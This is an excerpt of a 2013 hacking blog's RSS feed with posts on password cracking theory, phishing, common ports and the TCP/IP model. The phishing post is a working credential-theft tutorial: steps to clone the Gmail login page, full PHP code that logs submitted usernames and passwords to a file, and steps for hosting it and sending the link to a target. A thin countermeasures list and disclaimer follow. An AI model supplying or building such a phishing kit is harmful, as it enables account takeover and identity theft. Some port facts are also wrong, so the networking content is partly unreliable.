					<description><![CDATA[Hello friends, After a long time,I am here with  you all to share some password cracking techniques! This post is just an approach for cracking passwords. We will not be demonstrating any tool involved in password cracking.This is a theoretical post to make you understand how passwords and stored and what are the methods involved &#8230; &#8230; <a href="https://offensivehacking.wordpress.com/2013/06/03/password-cracking-techniques/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
										<content:encoded><![CDATA[<p>Hello friends,</p>
<p>After a long time,I am here with  you all to share some password cracking techniques! This post is just an approach for cracking passwords.</p>
<p>We will not be demonstrating any tool involved in password cracking.This is a theoretical post to make you understand how passwords and stored and what are the methods involved to crack any password!</p>
<p>Dont worry, in coming few posts we will be practically demonstrating the techniques. As of now, just get your concepts clear! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>SO&#8230;</p>
<p>First of all, many applications provide encryption/hashing for storing passwords&#8230;</p>
<p>Your passwords are stored in an encrypted form.</p>
<p>Storing the hashed or encrypted values for passwords is definitely much more secure than storing their plain text in a password ﬁle.:).</p>
<p>Steps involved in authentication:</p>
<ol>
<li>The user creates an account.</li>
<li>Their password is hashed and stored in the database. At no point is the plain-text (unencrypted) password ever written to the hard drive.</li>
<li>When the user attempts to login, the hash of the password they entered is checked against the hash of their real password (retrieved from the database).</li>
<li>If the hashes match, the user is granted access. If not, the user is told they entered invalid login credentials.</li>
<li>Steps 3 and 4 repeat everytime someone tries to login to their account.</li>
</ol>
<p>So&#8230;basically if we crack the hash&#8230;.we crack the password.. <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f600.png" alt="😀" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>So&#8230;LET US SEE THE WAYS TO CRACK IT:&#8212;&gt;</p>
<p>1. Dictionary based attacks</p>
<p>A dictionary attack uses a file containing words that are likely to be used as a password. Each word in the file is hashed, and its hash is compared to the password hash. If they match, that word is the password.</p>
<p>These dictionary files are constructed by extracting words from large bodies of text.</p>
<p>Simple enough! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>2. Brute Force attacks</p>
<p>A brute-force attack tries every possible combination of characters up to a given length. These attacks are very computationally expensive, but they will always eventually find the password.</p>
<p>Passwords should be long enough that searching through all possible character strings to find it will take too long!</p>
<p>There is no way to prevent dictionary attacks or brute force attacks. They can be made less effective, but there isn&#8217;t a way to prevent them altogether.</p>
<p>If your password hashing system is secure, the only way to crack the hashes will be to run a dictionary or brute-force attack on each hash.</p>
<p>&nbsp;</p>
<p>So these are very commom password cracking techniques&#8230;.We will be looking into practical application of these techniques very soon! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>&nbsp;</p>
<p>Thanks a lot,</p>
<p>Hope you liked it! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
]]></content:encoded>
					
					<wfw:commentRss>https://offensivehacking.wordpress.com/2013/06/03/password-cracking-techniques/feed/</wfw:commentRss>
			<slash:comments>3</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">96</post-id>
		<media:content url="https://0.gravatar.com/avatar/f9b2f6b1746c568184dbc2a3253de7646588c9fa142f47c3defe2c96ab7b330d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">kshitijkhakurdikar</media:title>
		</media:content>
	</item>
		<item>
		<title>Phishing Attacks and Countermeasures</title>
		<link>https://offensivehacking.wordpress.com/2013/02/02/phishing-attacks-and-countermeasures/</link>
					<comments>https://offensivehacking.wordpress.com/2013/02/02/phishing-attacks-and-countermeasures/#comments</comments>
		
		<dc:creator><![CDATA[offensivehacking]]></dc:creator>
		<pubDate>Sat, 02 Feb 2013 17:06:17 +0000</pubDate>
				<category><![CDATA[EMAIL HACKING]]></category>
		<category><![CDATA[GAINING ACCESS]]></category>
		<category><![CDATA[anti-phishing]]></category>
		<category><![CDATA[fak login page]]></category>
		<category><![CDATA[Identity theft]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[spoofing]]></category>
		<guid isPermaLink="false">http://offensivehacking.wordpress.com/?p=76</guid>

					<description><![CDATA[Hola Folks&#8230; Very interesting topic to share with you all&#8230;Its PHISHING&#8230;&#8230;Perhaps the most common attack and easy to implement&#8230;.in addition&#8230;HIGHLY EFFECTIVE!!!! 🙂 So&#8230; What is the main motive behind PHISHING ATTACK? Phishing attack aims at stealing one&#8217;s credentials for eg:username,password,etc. It is a very common form of IDENTITY THEFT attack! So the idea goes like &#8230; &#8230; <a href="https://offensivehacking.wordpress.com/2013/02/02/phishing-attacks-and-countermeasures/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
										<content:encoded><![CDATA[<p>Hola Folks&#8230;</p>
<p>Very interesting topic to share with you all&#8230;Its PHISHING&#8230;&#8230;Perhaps the most common attack and easy to implement&#8230;.in addition&#8230;HIGHLY EFFECTIVE!!!! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>So&#8230;</p>
<p><strong>What is the main motive behind PHISHING ATTACK?</strong></p>
<p>Phishing attack aims at stealing one&#8217;s credentials for eg:username,password,etc.</p>
<p>It is a very common form of IDENTITY THEFT attack!</p>
<p>So the idea goes like this,</p>
<p>1. The attacker creates a fake login page of a website on which the target user is registered.</p>
<p>2. He/She then uploads this page on any file hosting website and notes down the link for that page.</p>
<p>3. He/She sends the link to the target user and somehow convinces the target to enter his/her credentials.</p>
<p>4. The credentials entered  by the target are sent to the attacker.</p>
<p><strong>So How do you go about this?</strong></p>
<p>Step 1: Go to the website on which user is registered.</p>
<p>Suppose you want to hack the target&#8217;s gmail account&#8230;go to gmail.com</p>
<p>Step 2: Right click on the gmail login page and select &#8220;view page source&#8221; option</p>
<p><a href="https://offensivehacking.wordpress.com/wp-content/uploads/2013/02/fake.png"><img loading="lazy" data-attachment-id="77" data-permalink="https://offensivehacking.wordpress.com/2013/02/02/phishing-attacks-and-countermeasures/fake/" data-orig-file="https://offensivehacking.wordpress.com/wp-content/uploads/2013/02/fake.png" data-orig-size="1600,900" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;}" data-image-title="fake" data-image-description="" data-image-caption="" data-large-file="https://offensivehacking.wordpress.com/wp-content/uploads/2013/02/fake.png?w=584" class="alignnone size-medium wp-image-77" alt="fake" src="https://offensivehacking.wordpress.com/wp-content/uploads/2013/02/fake.png?w=300&#038;h=201"   /></a></p>
<p>Step 3: A new window will open giving you the source code. Copy the source code and paste it into notepad file.</p>
<p>Step 4: Search for &#8220;form action&#8221; keyword in the notepad file.</p>
<p>Step 5: Replace &#8220;action&#8221; field value to &#8220;login.php&#8221; as shown in figure.</p>
<p><a href="https://offensivehacking.wordpress.com/wp-content/uploads/2013/02/fake2.png"><img loading="lazy" data-attachment-id="78" data-permalink="https://offensivehacking.wordpress.com/2013/02/02/phishing-attacks-and-countermeasures/fake2/" data-orig-file="https://offensivehacking.wordpress.com/wp-content/uploads/2013/02/fake2.png" data-orig-size="1600,900" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;}" data-image-title="fake2" data-image-description="" data-image-caption="" data-large-file="https://offensivehacking.wordpress.com/wp-content/uploads/2013/02/fake2.png?w=584" class="alignnone size-medium wp-image-78" alt="fake2" src="https://offensivehacking.wordpress.com/wp-content/uploads/2013/02/fake2.png?w=300&#038;h=169"   srcset="https://offensivehacking.wordpress.com/wp-content/uploads/2013/02/fake2.png?w=300 300w, https://offensivehacking.wordpress.com/wp-content/uploads/2013/02/fake2.png?w=672 672w, https://offensivehacking.wordpress.com/wp-content/uploads/2013/02/fake2.png?w=1344 1344w, https://offensivehacking.wordpress.com/wp-content/uploads/2013/02/fake2.png?w=150 150w, https://offensivehacking.wordpress.com/wp-content/uploads/2013/02/fake2.png?w=768 768w, https://offensivehacking.wordpress.com/wp-content/uploads/2013/02/fake2.png?w=1024 1024w" sizes="(max-width: 672px) 100vw, 672px" /></a></p>
<p>Step 6: Save this file as &#8220;index.html&#8221;</p>
<p>Step 7: Now open notepad and type the following code for login.php</p>
<p>Code:-</p>
<p>&lt;?php</p>
<p>header (&#8216;Location: <a href="http://www.enteryoursite.com" rel="nofollow">http://www.enteryoursite.com</a> &#8216;);  //website to which target will go after the username and password is entered</p>
<p>$handle = fopen(&#8220;password.txt&#8221;, &#8220;a&#8221;); //creating a file called &#8220;password.txt&#8221;</p>
<p>foreach($_GET as $variable =&gt; $value) //writing the credentials into password.txt file</p>
<p>{</p>
<p>fwrite($handle, $variable);</p>
<p>fwrite($handle, &#8220;=&#8221;);</p>
<p>fwrite($handle, $value);</p>
<p>fwrite($handle, &#8220;\r\n&#8221;);</p>
<p>}</p>
<p>fclose($handle); // closing the file</p>
<p>exit; //exit</p>
<p>?&gt;</p>
<p>Step 8: Save this file as &#8220;login.php&#8221;</p>
<p>Step 9: Now upload index.html and login.php file that we created on a file hosting websites like <a href="http://www.000webhost.com/" rel="nofollow">http://www.000webhost.com/</a></p>
<p>Step 10: Send the link of &#8220;index.html&#8221; file to the  target</p>
<p>When the target enters his username and password, it will get stored in &#8220;password.txt&#8221; file which was created in Step 7.</p>
<p>NICEEEEEEEEE! ISN&#8217;T IT?????</p>
<p>To aid phishing attacks we can use email spoofing techniques which we will be seeing soon! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>As of now we will discuss some Countermeasures for Phising attacks!</p>
<p>Countermeasures:</p>
<p>1. Dont click on suspicious links.</p>
<p>2. Always check URL while entering your credentials for phishing page links.</p>
<p>3. Use antiphishing tools like Avast!,ESET Smart security. There are many anti-phishing toolbars which notify you about phishing pages like <a href="http://toolbar.netcraft.com/" rel="nofollow">http://toolbar.netcraft.com/</a></p>
<p>4. And lastly, USE YOUR BRAIN! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f61b.png" alt="😛" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f61b.png" alt="😛" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f61b.png" alt="😛" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p><img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f600.png" alt="😀" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f600.png" alt="😀" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f600.png" alt="😀" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f600.png" alt="😀" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>So&#8230;That&#8217;s all for this post&#8230;HOPE YOU ENJOYED! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f600.png" alt="😀" class="wp-smiley" style="height: 1em; max-height: 1em;" /> I will keep posting more tutorials&#8230;..Stay in touch! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p><strong>NOTE</strong>: This tutorial is for education purposes only. Try at your own risk. Offensive Hacking doesn&#8217;t hold any responsibility of your actions.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://offensivehacking.wordpress.com/2013/02/02/phishing-attacks-and-countermeasures/feed/</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">76</post-id>
		<media:content url="https://0.gravatar.com/avatar/f9b2f6b1746c568184dbc2a3253de7646588c9fa142f47c3defe2c96ab7b330d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">kshitijkhakurdikar</media:title>
		</media:content>

		<media:content url="https://offensivehacking.wordpress.com/wp-content/uploads/2013/02/fake.png?w=300" medium="image">
			<media:title type="html">fake</media:title>
		</media:content>

		<media:content url="https://offensivehacking.wordpress.com/wp-content/uploads/2013/02/fake2.png?w=300" medium="image">
			<media:title type="html">fake2</media:title>
		</media:content>
	</item>
		<item>
		<title>Ports and Protocols</title>
		<link>https://offensivehacking.wordpress.com/2013/01/09/ports-and-protocols/</link>
					<comments>https://offensivehacking.wordpress.com/2013/01/09/ports-and-protocols/#respond</comments>
		
		<dc:creator><![CDATA[offensivehacking]]></dc:creator>
		<pubDate>Wed, 09 Jan 2013 15:22:08 +0000</pubDate>
				<category><![CDATA[INTRODUCTION]]></category>
		<category><![CDATA[NETWORKING]]></category>
		<category><![CDATA[http]]></category>
		<category><![CDATA[imap]]></category>
		<category><![CDATA[ports]]></category>
		<category><![CDATA[protocols]]></category>
		<category><![CDATA[tcp]]></category>
		<category><![CDATA[udp]]></category>
		<guid isPermaLink="false">http://offensivehacking.wordpress.com/?p=71</guid>

					<description><![CDATA[Hello Folks.,&#8230; This is one of the coolest and practical topic of networking!!! B) Ports and Protocols! 🙂 🙂 🙂 So..let us begin&#8230; B) You can think port as a &#8220;door&#8221; to your node(your computer)&#8230;it is a channel for exchange of information what we call as networking&#8230;Every communication happens through port. Protocol in simple words &#8230; &#8230; <a href="https://offensivehacking.wordpress.com/2013/01/09/ports-and-protocols/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
										<content:encoded><![CDATA[<p>Hello Folks.,&#8230;</p>
<p>This is one of the coolest and practical topic of networking!!! B)</p>
<p>Ports and Protocols! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>So..let us begin&#8230; B)</p>
<p>You can think port as a &#8220;door&#8221; to your node(your computer)&#8230;it is a channel for exchange of information what we call as networking&#8230;Every communication happens through port.</p>
<p>Protocol in simple words mean the way communication has to take place or the rules for communication on which both the communicating parties agree! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>As we know data is exchanged in the form of packets over the network which is done in a standardized way( a protocol ), network clients use different ports to transfer this data!</p>
<p>The port number (and the destination IP address) is included as part of the <a title="What is header ?">header</a> in each packet!</p>
<p>So to identify different ports they are assigned numbers&#8230;Port numbers vary from 1 to 65536..</p>
<p>There are two types of ports :</p>
<p>1.TCP Ports</p>
<p>2. UDP Ports</p>
<p>so this makes up our next post..TCP and UDP..we will see what are they! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>Port numbers are generally divided into three ranges:</p>
<p>1. The Well Known ports: 0 to 1023<br />
2. The Registered ports: 1024 to 49151<br />
3. The Dynamic and/or Private ports: 49152 to 65535</p>
<p>Let us see some famous Port numbers and Protocols associated with it!</p>
<table width="461" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> 20,21</td>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> FTP, File Transfer Protocol</td>
</tr>
<tr>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> 22</td>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> SSH, Secure Shell</td>
</tr>
<tr>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> 23</td>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> Telnet, Remote Terminal Emulation</td>
</tr>
<tr>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> 25</td>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> SMTP, Simple Mail Transfer Protocol</td>
</tr>
<tr>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> 50,51</td>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> IPSec, Internet Protocol Security</td>
</tr>
<tr>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> 53</td>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> DNS, Domain Name Server</td>
</tr>
<tr>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> 67,68</td>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> DHCP, Dynamic Host Configuration Protocol</td>
</tr>
<tr>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> 69</td>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> TFTP, Trivial File Transfer Protocol</td>
</tr>
<tr>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> 80</td>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> HTTP, HyperText Transfer Protocol</td>
</tr>
<tr>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> 110</td>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> POP3, Post Office Protocol</td>
</tr>
<tr>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> 119</td>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> NNTP, Network News Transfer Protocol</td>
</tr>
<tr>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> 123</td>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> NTP, Network Time Protocol</td>
</tr>
<tr>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> 135-139</td>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> NetBIOS</td>
</tr>
<tr>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> 143</td>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> IMAP4, Internet Message Access Protocol</td>
</tr>
<tr>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> 161</td>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> SNMP, Simple Network Management Protocol</td>
</tr>
<tr>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> 389</td>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> LDAP, Lightweight Directory Access Protocol</td>
</tr>
<tr>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> 443</td>
<td><img alt="" src="https://i0.wp.com/b.quizlet.com/a/i/spacer.7bmQ.gif" /> HTTPS, HyperText Transfer Protocol with Secure Sockets Layer (SSL)</td>
</tr>
</tbody>
</table>
<p>So&#8230;Familiarize yourself with these ports and protocols&#8230;to be a good networker or hacker! B)</p>
<p>Thanks&#8230; <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>Hope you enjoyed! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
]]></content:encoded>
					
					<wfw:commentRss>https://offensivehacking.wordpress.com/2013/01/09/ports-and-protocols/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">71</post-id>
		<media:content url="https://0.gravatar.com/avatar/f9b2f6b1746c568184dbc2a3253de7646588c9fa142f47c3defe2c96ab7b330d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">kshitijkhakurdikar</media:title>
		</media:content>

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />

		<media:content url="http://b.quizlet.com/a/i/spacer.7bmQ.gif" medium="image" />
	</item>
		<item>
		<title>TCP/IP Model</title>
		<link>https://offensivehacking.wordpress.com/2013/01/08/tcpip-model/</link>
					<comments>https://offensivehacking.wordpress.com/2013/01/08/tcpip-model/#respond</comments>
		
		<dc:creator><![CDATA[offensivehacking]]></dc:creator>
		<pubDate>Tue, 08 Jan 2013 10:34:41 +0000</pubDate>
				<category><![CDATA[NETWORKING]]></category>
		<category><![CDATA[ip]]></category>
		<category><![CDATA[layers]]></category>
		<category><![CDATA[mac]]></category>
		<category><![CDATA[model]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[port]]></category>
		<category><![CDATA[protocol]]></category>
		<category><![CDATA[tcp]]></category>
		<guid isPermaLink="false">http://offensivehacking.wordpress.com/?p=65</guid>

					<description><![CDATA[Hellooooooo&#8230; As we learned in the OSI reference model  post that we are going to see TCP/IP model very soon..we come up here with it&#8230; Now, the TCP/IP model is presented in the following figure.&#8217; &#160; As we see, it consists of only four layers unlike OSI reference model which consists of seven layers&#8230; Now if &#8230; &#8230; <a href="https://offensivehacking.wordpress.com/2013/01/08/tcpip-model/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
										<content:encoded><![CDATA[<p>Hellooooooo&#8230;</p>
<p>As we learned in the <a title="OSI reference model" href="https://offensivehacking.wordpress.com/2012/11/29/osi-reference-model/">OSI reference model  </a>post that we are going to see TCP/IP model very soon..we come up here with it&#8230;</p>
<p>Now, the TCP/IP model is presented in the following figure.&#8217;</p>
<p><a href="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/tcpip1.png"><img loading="lazy" data-attachment-id="68" data-permalink="https://offensivehacking.wordpress.com/2013/01/08/tcpip-model/tcpip-2/" data-orig-file="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/tcpip1.png" data-orig-size="355,494" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;}" data-image-title="tcpip" data-image-description="" data-image-caption="" data-large-file="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/tcpip1.png?w=355" class="alignnone size-medium wp-image-68" alt="tcpip" src="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/tcpip1.png?w=215&#038;h=300" width="215" height="300" srcset="https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/tcpip1.png?w=215 215w, https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/tcpip1.png?w=108 108w, https://offensivehacking.wordpress.com/wp-content/uploads/2013/01/tcpip1.png 355w" sizes="(max-width: 215px) 100vw, 215px" /></a></p>
<p>&nbsp;</p>
<p>As we see, it consists of only four layers unlike <a title="OSI reference model" href="https://offensivehacking.wordpress.com/2012/11/29/osi-reference-model/">OSI reference model </a> which consists of seven layers&#8230;</p>
<p>Now if we remember,TCP/IP model is the implemented model where OSI model is just a reference model&#8230;Right?</p>
<p>BUT WHY??????</p>
<p>Answer is that TCP/IP model provides more flexibility and integration..We can add and remove protocols in it as needed.(protocols?? what are they?? we will see it in next post) whereas</p>
<p>OSI reference model is strictly-defined as far as protocols are concerned and is stubborn for flexibility. As of now, just see protocol as &#8220;rules for communication&#8221;..</p>
<p>Now coming back to TCP/IP&#8230;it consists of four layers:</p>
<p>1. Application layer:</p>
<p>The application layer is the layer nearest the end user. This is the layer that is in charge of translating data from applications into information that can be sent through the network.<br />
The basic functions of this layer are:<br />
&#8211; Representation<br />
&#8211; Codification<br />
&#8211; Dialog Control<br />
&#8211; Application Management</p>
<p>2. Transport layer:</p>
<p>The transport layer establishes, maintains and finishes virtual circuits for information transfer. It provides control mechanisms for data flow and allows broadcasting, and it provides<br />
mechanisms for the detection and correction of errors. The information that arrives at this layer from the application layer is divided into different segments. Information that comes to<br />
the transport layer from the internet layer is delivered back to the application layer through ports(coming in next post <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /> ).</p>
<p>The basic functions of this layer are:<br />
&#8211; Reliability<br />
